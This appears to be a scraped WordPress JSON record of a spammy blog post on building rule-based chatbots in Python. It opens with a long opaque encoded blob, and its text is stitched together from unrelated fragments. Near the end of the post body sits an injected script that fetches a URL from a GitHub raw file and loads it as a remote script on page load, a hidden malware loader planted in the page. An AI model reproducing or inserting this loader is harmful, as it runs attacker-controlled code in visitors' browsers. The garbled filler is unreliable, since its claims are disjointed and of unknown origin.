WosqZ\/XMWlqc\/sans5t6syP7WOmzx9ytWDrqa8hN\/5wvVit\/LJzBv+drl3759zl3j5eGyuOqRs7ytdw7RadMXH3GpuNdI0G+QjWxtCvRZ1N7T6k1tbh73f5EBqt\/Srtx6Hp9cUOne9yTNojNaszfW703xfbnMd+l2+ve8zSuZFNRXrcMkZ0XayRX+V4lDsTU5Vzcb3ZB6x2Yqb3Wu+XHaPYFdRwkquNfk7F19mt82GVbbiQa79Gmt31HjlWvVbn3\/hn527jm+OjPMtrmg3Deqtxc+etT25sbbMfX8crql9fj5uye3QQ3y4\/\/ixu07Vpc9fsOOe3NaKfAfN1n+7VtqrrnV9J\/XpXs2avtOsuydpycz6yJnvtbG2qOjrmVu+sq5gttFELSboexF44s9uNLe5bqvrc6q7Oo8ZfzR2u9Spp21ETyb9+v65RN\/ZUokaFDTJHqs6O8+p5X1XifSVeSWaPjOy+OSd+7Cy1rnXt+Lq0cZVzm3Nyna7Gdj7pa3XtNrW5A7\/U3Bdl2G7UH6fi0JWXoefQq9odPFjQUh8Xs1epM7\/pPYei+JVj7mHzED1rHN5YqxcYhLb0Gutn73nwSfcC1GWa9n6MurhZPGtuFu\/+LyrDBzTqCKHX17O+lCa7TKNef2L+ij9kQwh9vHZeePM3XLwUf27lb+V0o55rZ\/sbR+REo36b+AHR68pAo44QukFP\/O2R+xUmmnR0TeXlWtdQFy8\/n02zRv38FVSaCXRI\/UpyFk36XZo06j7WUp807uJX+XnveVEZaNQRQgghhBBCCKGPlIFGHSGEEEIIIYQQ+kgZaNQRQgghhBBCCKGPlIFGHSGEEEIIIYQQ+kgZPkWjXv7gxMU\/AMRfmkRG7Q9M\/Sp\/oCP788Y1flfM2h9FeaK\/pDz7o1LoMUr79dv8U3qfVe\/4Tz4Gf\/X6maT++FS495V\/NcLW32PWfTz2YzQauxwvPt\/6RxBL\/bzNvnfn2LnebvVroQ8aW9Xoiz1rfrV3pKcSPcnnkWG7UX\/Ll6e3fjErG994UwznZlEgo6d7COWHvXion9p7Uc7+0Kh75XnjGD7mhf12vfVe+Qz6DD5u6WHPoOuN+s05yHvSczfqc79+tUZdnr+16aRRD8\/fo42xP+JZc+\/ee9fz\/h49bK98Yn0GH1GR4VM06jMN52ZRoJdRedm5uobyQ5Ua96JR\/1B9Bh+39LBnEI1609qv0vDaWD2yUX+bJmY19v2N+tusyTvHfst6++CxX7FR\/zA9bK98Yn0GH1GRYdmot5+QOakNpDwk2jm10FNxHdfKcdr5vbEHGr1My2Ju38hl6WuXc9dxfgR2L5XutbbZY8o2MW+7Vi1I\/ZBtm6n0Yfvhn8Ye5OM8n+aW9ql81J+AR+fuHlvXkY5Bkc2b9Fufs7Vh7HbnZ3PLcz0PTWne5GfKS7tf5cPmOsvOf48mLzuTOsvxEn42+7vtk1znmBw+yPEvxuwct0mML2Pp\/FrV2SF5\/+gaL1MDp7r9ec5j7mGupzHbUPKt3Xuo2RzGK0mOP8n1TsxGSr76a4ufzXdrn4rJct3btWnnm63NlaKcynrU59W8GzHTfss13ePTa0XOe8jk+oxZuF8k+fHPcyqeSd5vXaexHlJnws42nozbOGbJ5tmecsjEzNflXHEtr5VtPvzcXveXavQ9lGJr6q9qnI+PlLf31tw9VG0vM8dbfZTPj6kFPeaO1utH1q97rp3Hhbbnl\/uNr7M0fsrdeP0sNFr3W3ultO2Qisk6ZiPF9dj3\/fx5tlfmc8lOYZ+Z2+XF2T46h15ahgd8o14Ks58rxXMWaltgrUDNgzzptg04zeM3hHAjPReEOFY1nHvD7rFMDA7lDepcpPZ8+Xza4XzQvuaxhG15Me8uUutXjo2IYzvffDXntR8m93eNbeuoPuzOudqmNchBHrufszHJn8VYVns1GNdc20zb\/XruKEZ+jPtkY9c0rzNpZ86rqaFprutYPeZ2rqY4ZlrpmjivYV5snZnc68++jpaa7BfzXK9ittI6VuM6tfEvn89rbczs2pwo++jiV3zL84XxF2O3uds10z3F+zj2eS01dp5Xxiiu6fO8jVnoZ\/8crXtZK9rPYy4ZUzt2O2bWZJMey\/oRf\/Zrc6xxzHfqrPhR1krg0zBmZax+Pprrb1s1O9KttVR86fdqu9Pnfwq7bPyfQYPYTfPxkfL23pq7h2rwbMhxq+vxUbUgx9zTfP34mj0+G1\/uj3FcZ2Wu8fqZa1C7UsO9Mt4L1T6sYrafrzg\/5f4Scx3\/9vkcuz6P+rPSXG\/WpvXxKdYDehsZ7m\/UU7GZBaIK2C0gv+huK7i0IOo4YvMMF89gc00azr1h90zaDn1vuEnJ+RZzJ5vV+Yl\/Tm5subHU88pPu\/GYeaZ2Xxg7nzNjK7\/S3GIsoxQTfS6I+SRGLqah9JhNruak3fn\/y3vmftymEkdbx6s6a+e\/h74vch3EIl5LccykfO70OTemqzM9R86lyEcYh5km62ma62XMVkr3z\/fCOMbrXHs7zNqcKd1bfe7zt5jHtafsTPerGhBzB7G2PuZ8XsnfqRLP7qOxNc1txlX5dTHzdabjJ8+XuVStuPGk9NhZw+vTtZM6c\/ddyHWVzUHTVp0dtn1P11kbD81j5mOg7UjnY7t2NfJrpfm693LXf7iC+jo0z8dHalULH6VkV827qPuZbbfWwvX7ZjFL52yu\/b5wf4zj+rm6frSK7VO73J4njtt53DNb27sd9zR2vU7HuYyXx5ntldmOUfyDPdv4mK4NfUavL8P9jXpeCEfBWLVCN8UVLYxbN4d0Xyrk9BPMb\/8oP8VMi8ONNdkUpn4t7J5KzpnGEgs\/3AjkfIu5b41XlhvbvLy680J1Y3G5Htp9YezonIxh\/v+j+Jd5nF1BnbVzPn56DP1Aa4prYP4QSveYGAxq8XaZOFet6iyfH8VjlevtdbxYN8kea6NQOKarFT1H8avFOI7NVCp\/WtNcL2O2ITWGt2G09le59jG7EJdkU773iPOxz5ZvglPMk31lHLtelJ1ubqEg1t7HnbUZqd7X4pLn+luvxWTXGWuhdv20zrRNXfr8zNbkZ3xv1Shuqzob5Ho\/bnfWWbPHXreMmd8rnB2L9bHSyK+Vpuv+\/Cx9OuT8\/0j52K7z8ZHaqIUPUYpZsetH3gtLDSTbzvX1oFoI19pUs5iN8y\/3hftjHM2zsX5WWq370V4ZHVdze3uzrdFYVmmcfN0xhnsubuyV0xgEe7bzRa\/fK\/s7enIZHtOoz4ranfcL49bNIS2Er\/\/64yjWo9iPov92jKE2zKbJgtj3K96AxuoLzdoUbQTq2GLuW+OVNVjsp32zfE43lkP3jJ3O2bHVsVn8g01tqjTWJIbZz2i82Aa3Ias46c30bTbUMof1Z1Vn5\/+P\/F3lOohFXJezvKVzszkGY7o6MnPkuhExH9XcSBPfp7lexuya8lxmvNHaX+Xax+zKmql5OsZIc6cX1Pzf9OXxotozx9zcQkHMpvtbvn5\/DaWxZC2ocWd2Jbnzss5W8Zuf97kN1snIvlWdufuu5LrorjrLtiV\/4roY2+FjMKsFH8O1prU1UZ5ruMd7X931H66gvm6oi\/fTtVp4TyU7vv1x2Jdq\/qj3b3+kODZbH1cL1++bxazYpXPtj90fY29D0nz9XFMey9472ivP\/Wh0zNu7H\/d07zHOMV6KmX4u1nFme+U0BsHaHPmYlMd61rWMLsuw3ahHRVdUFvtwcbviGiyMUQFOlO77+q+jQc+L6hj3aNi\/nRum0GRBDOfesHupPMZhox3fLaoSw\/Nzuu+0tyxY+VPuuzZT41f2X8bG+S1VbRltYneNbeuozCX9TH6P7ndzTeXH1jL5UMd7Hpry3KOH0NTnruxbOOeOBv4s6kzVfrJT+bbIdRCLuC7jmLXxV\/6GY7qYyjn2xp1Lx0lqmutlzC4q50TXtMqZ1M6eIu67tl7SWOnXmftvLaVvEJqfbixrt8uXlLazjHXL2gykchOpjDWca1pnqxjO6zDfK8Yu67+PnZXtN8eyFnVm7rtlb7H2ndqpsxYTd+0qZjq+SfGeUmXrbEPT8SbKdg\/XvYlB9fvqPnBLnvblY5s0z8ee3sZuHdNi58XctTwM957blPz9lt47ky1pjvRt6oNrIcnV3FLz9ZPzJGKRxzexiY5d06TOhuvnoqJ1n8fz87Z89Lope2f\/bOyt+dqr5XTv+Lnoxyq26NoYxyDny4w1zo0Zu+pt1iZ6cxm2G\/Xz5SAVS5LaQEqRnOcOnYWxeNkpmo09UV6wfa5SlL3w8+bQxjxlF8Zg7i27VypxCR8ubeFV2WvaAkvKP70Vc6dz4Zg7qjHrMvFwfluZeB06bbl7bFNHQR3IuCTJDcjl+5zL27yqXxVf51dSz8f8IRTMfeixG2qZ42qdZbtFPlr8+jWTXAfrQdXlTszc+RYzn48kNfZsbUZzT+sukBrD2D3MddIsZgs5u3V8i8z4zpZ+Ts3rxjZrc6o6Z4thnUeOr\/Np7Hb5MpK2Hf6ksfrYi7W5kN0v\/P1+\/CvPLlfH5\/UlZuP1rOfNP3AO8q3H368zeV86nuJwbW+5p86EnS234v5xzHx853uKj9dKarwLyjZP1r3NU\/5v9OX1O6r+3WLfUC5mSTpu43xs6i3sTpK2H7G8nrtWw1f2urVKvFoMzd54nq9231oLh1zNLbVYP\/WztM3HZbLuZ1rUmfPFPTcncmNrH5ts3PvYZo9XPplzh\/b3SZP74Lk43SuXMZC2Hdel69Ve2cd1Y1e1fN\/2Xok+TIYLjTq6Lr9xfrjSpnf1Qbyrtxz7VRXFJD94Nh9S6KLKw1M\/mMqxay95v5g+49qMXoTysSfbk9G76dZG\/V1UX+pf7qX6ie3OjcqL7nvXG3V0XU\/4jo6QgUb9DZUfEs+20dKov6vyw9bE5JVfHp5f5SfN6qXxVV+AH6nPuDaDH4iVb134Idln1XM26v1bzNfao57Y7rz2X\/s5S6P+HqJRR08oA436Gyg3Ys\/6kKBRf2f1l5lTxOht1V7ShD51k570SdfmuRefokn\/zFL1wD6MnlCqRmnU31jjRt0\/O6R4jqA3lIFGHSGEEEIIIYQQ+kgZaNQRQgghhBBCCKGPlIFGHSGEEEIIIYQQ+kgZaNQRQgghhBBCCKGPlOH9GvX8B57464qxon9S6l6Vv3597S\/cij98Jv7Qzq\/410fTHwoZxWbkb\/mL0S\/4h8nqXz1\/qRwmmyd\/7Cnl4lP\/c2sIIYQQQujXkuEFGvW3aGKfTU\/SqJ9\/GVrYk5u8Z\/kLl4+L07BRz3Ua+\/sZG\/XZDzTu1uIvkee\/ujq0Ofhn2BBCCCGEEHpVGd65Ub+l4aNRv003NDIpR7kxavY8W+zfulGn+bP6yEZ9me+n+iESQgghhBBCd8jwBP+NenkZj\/59wvyN2nm8SzYO7VvOJvlS3349Vo6z1YSNGgDTWGj7\/qZ+W6A1ONI+PXdpCvv95nz+wUY\/92bNkpLIxeHnj2T71W9hF3bfGjN9X5ccX9eCzZ+tM29bvj\/0V+ZK25y0U2faNn1+dW4+9nj9JMn7rL9Jo7nt8VMqPrqG1fj1hz5ynPN8+4bfab3mrFrNROcQQgghhBB6GRk+vFHPL\/LTZnDyrVpuCsXLff7cG6nWJJwv8vb6oVID4hsy2TTksUUDUebqY58NUvVNX1986g2G9XEw\/7sq2bATK6m53ffFLGm\/Fuy9eWxRZ77Bm4x9Kvav+NHHW\/mpdLGGw7Gn66cobGg3vpEO78uyNZxiI+KX\/RAxt362Yyq\/kRZrYWsMhBBCCCGEnlyG52jUp83CqIGyjUKRbCx8E7N46T+Vxq7XiWamj2eakvOefiw3hrKBkE2Ray6sj2X8uEF6H40btJlmdt8Zs+B6qXSvPi5yHTSk3j9xvbhOK77G1ZmaL\/K7qfhj4yVtm4+9s36KwnzmsUa2FYX3JaV7TYOsbHU1HsRuq8ke5zwryC1CCCGEEEIvJ8MT\/Op7aQbyt29hkzd6UY+PT5ucadOklcZJ1\/31r3\/+\/PaPf+YGI41Xxo4aNm3PsMFJWjbqh2oTVeLyzo1Isy\/97zAvAw3tvjNmWfNaaLZ21fmCZs7Nla+x9llFPgR1Juebjhv7M63hgS\/N51H8hrEVOY6a5q37pB7eqE9syIpzghBCCCGE0EvJ8BSNeld66bYv5fPmLLq2HYsb9b2X+tKU\/3GMdzRFR3P07RgzNQzFjmKntkkfmzYXrkEZ+ViU\/Xi3Zr3FSNiUmsONhspK231nzLLmtTCK36i51XM1v\/s1XvE182Z6Nq6u1+jYfGyrEs8ohuvYlmts4zy8b9VkP6xRv55bhBBCCCGEXk6GJ2vUo8alNhCq4S5yDWx68RefbZMTNSIjpXu\/\/uto0PP9R5NxNOzf2q\/DH+ftWHku8XnY4CTl5sKM5ZpYIeNXVh5j359ddbtFg7TVUAUydt8Vs6o8xk4tKJUGtsW3XGvnWjSEWXHTncebNNPWbyln96KG541pvH6SdmKb5zJ2RseKxj8UyHI1E8TOrINYccxP3VqbCCGEEEIIPZMMH9yol8Yi\/NVZpdIUtGtkc1AanXZOv9Drc4euvNDnhqk3brnZMg1SOdbkz80aI2lbui5dfzaJde6uoFF5i0bdNj3CjnkDW7Vh9z0xK9qthUMDX1KNpWvtXPn+KJ7Or6TuW75v0Uxrv3U8td1BDQ\/HXq0fHaum5reeN0nbXGTmWIyvaljFMm64tQ3B\/G4crb2aQQghhBBC6MlleLJv1B8r1+QgNFVpPLd+KIHeQYvfcpj+dgFCCCGEEEIvJAONOkJS+dtzmr9nUP4thOH65YcqCCGEEELoF5Lhkzbq8a8En6K5\/9TiBzxPoPRt+eRX3lOO+JV3hBBCCCH0y8jwSzfqCCGEEEIIIYTQ08tAo44QQgghhBBCCH2kDDTqCCGEEEIIIYTQR8pAo44QQgghhBBCCH2kDDTqCCGEEEIIIYTQR8pAo44QQgghhBBCCH2kDDTqCCGEEEIIIYTQR8pAo44QQgghhBBCCH2kDL1RBwAAAAAAAIAPh0YdAAAAAAAA4ImgUQcAAAAAAAB4ImjUAQAAAAAAAJ4IGnUAAAAAAACAJ4JGHQAAAAAAAOCJoFEHAAAAAAAAeCJo1AEAAAAAAACeCBp1AAAAAAAAgCeCRh0AAAAAAADgidho1P\/6+f3vX35++7N+\/GT89fvXn1++fB7\/s7+\/\/aiffl1+\/Pbl59ff\/6qf7uPjYvaWa\/OZ1v1FW\/79\/efXY82mdfvly7efv341R1yLWa7hv38\/7oJtFnWW9phy7nF7TaM9l7I+wX79WMraoN4P2CvhPfiwvfKZ3mM+grrXtdi\/2LPis\/QjK2jUF7QXotD\/P7896cP+9pw998J4XC1ebtTzgyZ+kbk7ZpOx5zwgHsMafqZ1f6MtN8f1V+BazHIN07jcxqLOHvlDQQsvMrdQ1gb1LvigvfIt18bL8rTvlQ\/grfbKl3iPeX9e+rmecvpp3980NOr3QKP+zjyuFmnUKzTqvyjXYkajfgdv9fK5AY06PIQP2itp1ANo1OunC9Coh7zu+vrx89voC9JPyIVGvQSu\/AqFWWh58bVzh9qLw2hRqkVVxnf3HkQvj+5YGuuc++vP7\/+uxxNtHmnf9kuN9NeMa\/09tfegSz58\/f17Hf+4p\/nQbHObTrJF2mBiJuZNC7Mf79pdrO3FT46jF8s4XyuK339NxpYxPyRisONXtv08Z3NhY7YbE2PTqZ6PdczMGGfM1mPPuXdtiuOn2v0bY884176436xlnVPrs4\/N5U37tMFiauG0qxzXdeGPzeos+ZSulddcslvtZ\/LeZEeK0Swft8cs2xusNz2\/GFuu+2Tz8Vn6vLe2CsuYjWq4YWIW5c\/fW477+KQYiloc5kMwrLNC8+8qus7iPSFfY+ORMbVwae2N2IuZtltfn86lWMj5w5g6av3\/XvNx+Oxr1M4t\/TJ1kGRiMq2z9kyW14Rxj0jxOepD3ivnPutH5EzZNs\/lkun6qAxr2MTtnHsvHyNsjZySMd3JR\/1oa7CtOTlPt2uRj8Rw3Zd7v9dxv\/7+o8ZnUmvW7uOztOvMh\/X3lMyLreMoZ2PG677mc\/p8WTCMmWBYZ4WWt22WMSvxGr\/HtPMyNjIuxxWqVq3tk1zvMFmbeV63HqxfY7vbNaN4ar\/svQcT2\/Q5f68ee1ALE5zvAjt2Vr12vu4Tsg76fScznw\/u9etWthv1ngyb\/OJ4N7h8LufT\/x8UQN0Yc5GdwTJj58LU96uFbM\/nIIuFdAa9HgvGWzPwISH8uEJJdhqzxjaNIRehG1fbMCviQhn3liJqhXjG2MR0mq8Fduz8+fTTjlVjo\/yc+GXs1GNbu00d7aA2Sc3crzSXvM+ul4PJ2HNqjERtaD\/tXOWz8ntYw3Zsm58F2Sd5v7bFxqjEsMXAzjXJ+4xBXP86Xi77etZzWbuK3T2+W3WW\/K458OPNOOaS9a7mWuXjvphJO7MPxmZdV2aubKc4b2K0Yh6zVQ2b\/BhmdqdzfZyGHG+WD8Fi\/cbzLDjG\/CbuGdVRPi5trMzmtGPlz5v5WsbMxih\/7vkpc\/UxRn55Su7ytXVvSWMo\/zdjlvDnSl0N66zVePMt2zCuO00Zq8fFrJ\/qT7xXmmtbHIKcx4jczMg2+BoY75Ub+dhgXKcb+XD5636mcVd7Ss9HMJf0QdV0vTedrzWR7pN+5LnP+03+Wh2182rsivOtczW+Elvz+bOpyZuf99OYCQZ11hjXw4JhzFZ+tfOD\/Bk\/bAynuV6Samm8Nl2uVexmdtcadRJzHWNN98rs98C2bIc4Z3O9yPGa4ltfjwIzd\/bZ5iP5WuPm8yXtKnHSe8w4H\/f7dTs3\/eq7LCCX4MS5aNK91XHhZL8\/BcY4bhZcCnwvfH19GkcvCmOrK7ZJAQyZJM\/Yukv3X9gji8CNq23I908L5hY\/C922Rpq7jbXO1ww3tvXZju0WxtivVCf6uIhZsMB0XW0QjNGY+hXg5l5cPyaIh4hjtsvmxuZrmD8\/tq+NCdknfX\/3W9ZUQ8znbLqxnjfjqv3Say3bInye1ln6dJxXtt+c24Qce5GPO2PWauW7tT+T7DA+yPnc3CaGC2YxW9dwmmu0lud2p7HLfSJW03wN\/Frk2K33WxjMoWu342J6UuKl62K\/VuYxK8esr9J\/Z+8idp04RyP\/M5Ox830iPvZzxta4yv1+zKK6UXZnO\/VYZ8zyvMaH7ZglZutDsDlmt\/uGfASM1sZWPtR5HWNX\/8o\/n4+RHQV5vfj\/woZ+fzpv4njB7oy7ppPjsp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width=\"300px\" alt=\"rule based chatbot python\"\/><\/p>\n<p><p>Read more about <a href=\"https:\/\/www.metadialog.com\/\">https:\/\/www.metadialog.com\/<\/a> here.<\/p>\n<\/p>\n<ul>\n<li>Constructing a chatbot can vary in difficulty, contingent upon the intricacy of the desired chatbot and your technical proficiency.<\/li>\n<li>The last process of building a chatbot in Python involves training it further.<\/li>\n<li>Using it frequently should improve its responses over time &#8211; though doing this manually might prove daunting at times.<\/li>\n<li>As CEO of Techvify, a top-class Software Development company, I focus on pursuing my passion for digital innovation.<\/li>\n<li>More and more companies like Reddit and X (formerly Twitter) are planning to close off their APIs to data scraping, which is what allows AI models to get unlimited amounts of training data.<\/li>\n<\/ul>\n<div itemScope itemProp=\"mainEntity\" itemType=\"https:\/\/schema.org\/Question\">\n<div itemProp=\"name\">\n<h2>What is the difference between rule-based and generative AI?<\/h2>\n<\/div>\n<div itemScope itemProp=\"acceptedAnswer\" itemType=\"https:\/\/schema.org\/Answer\">\n<div itemProp=\"text\">\n<p>Both approaches have their strengths and weaknesses depending on the problem to be solved, with generative AI being well-suited for tasks involving NLP and calling for the creation of new content, and traditional algorithms more effective for tasks involving rule-based processing and predetermined outcomes.<\/p>\n<\/div><\/div>\n<\/div>\n<p><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Building a rule-based chatbot in Python For the self-learned version, Neural networks are used to train the chatbots to reply to a user, based on some training set of interaction. For the task parts, we will be using a rule-based approach and for the general interactions, we will use a self-learned approach. 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